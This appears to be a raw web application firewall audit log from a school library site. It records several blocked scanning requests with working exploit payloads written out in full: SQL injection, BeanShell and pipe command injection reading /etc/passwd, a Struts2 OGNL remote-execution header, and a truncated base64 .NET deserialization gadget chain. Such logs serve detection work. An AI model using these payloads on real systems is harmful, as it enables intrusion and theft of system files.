[23/May/2025:01:13:21 +0700] aC9pQSektx75wRFPQygHNgAAAMo 103.236.140.4 32970 103.236.140.4 8181 --0b7ff339-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/zentao/user-login.html Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 72 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166344378 --0b7ff339-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --0b7ff339-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b7ff339-E-- --0b7ff339-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601539420 3376 (- - -) Stopwatch2: 1747937601539420 3376; combined=1634, p1=483, p2=1120, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7ff339-Z-- --831bbc10-A-- [23/May/2025:01:13:21 +0700] aC9pQeThJmFSRJ5-OZfqEQAAAEQ 103.236.140.4 32982 103.236.140.4 8181 --831bbc10-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 58 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635396 --831bbc10-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --831bbc10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --831bbc10-E-- --831bbc10-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601546493 1766 (- - -) Stopwatch2: 1747937601546493 1766; combined=544, p1=356, p2=160, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --831bbc10-Z-- --29db3550-A-- [23/May/2025:01:13:21 +0700] aC9pQSektx75wRFPQygHOAAAAMg 103.236.140.4 32976 103.236.140.4 8181 --29db3550-B-- POST /portal/login_init.action HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Java/1.8.0_333 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Cache-Control: no-cache Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 8yx7htwjwg').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Pragma: no-cache X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163523821 --29db3550-C-- --29db3550-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29db3550-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601545452 3398 (- - -) Stopwatch2: 1747937601545452 3398; combined=1952, p1=322, p2=1603, p3=0, p4=0, p5=27, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29db3550-Z-- --e16be56e-A-- [23/May/2025:01:13:21 +0700] aC9pQeThJmFSRJ5-OZfqEwAAAFA 103.236.140.4 32996 103.236.140.4 8181 --e16be56e-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 25 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635399 --e16be56e-C-- type='|cat /etc/passwd||' --e16be56e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e16be56e-E-- --e16be56e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601550006 1541 (- - -) Stopwatch2: 1747937601550006 1541; combined=481, p1=345, p2=107, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e16be56e-Z-- --20ec0876-A-- [23/May/2025:01:19:15 +0700] aC9qoyektx75wRFPQygHPgAAAMU 103.236.140.4 33038 103.236.140.4 8181 --20ec0876-B-- POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 162993415 --20ec0876-C-- {"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAA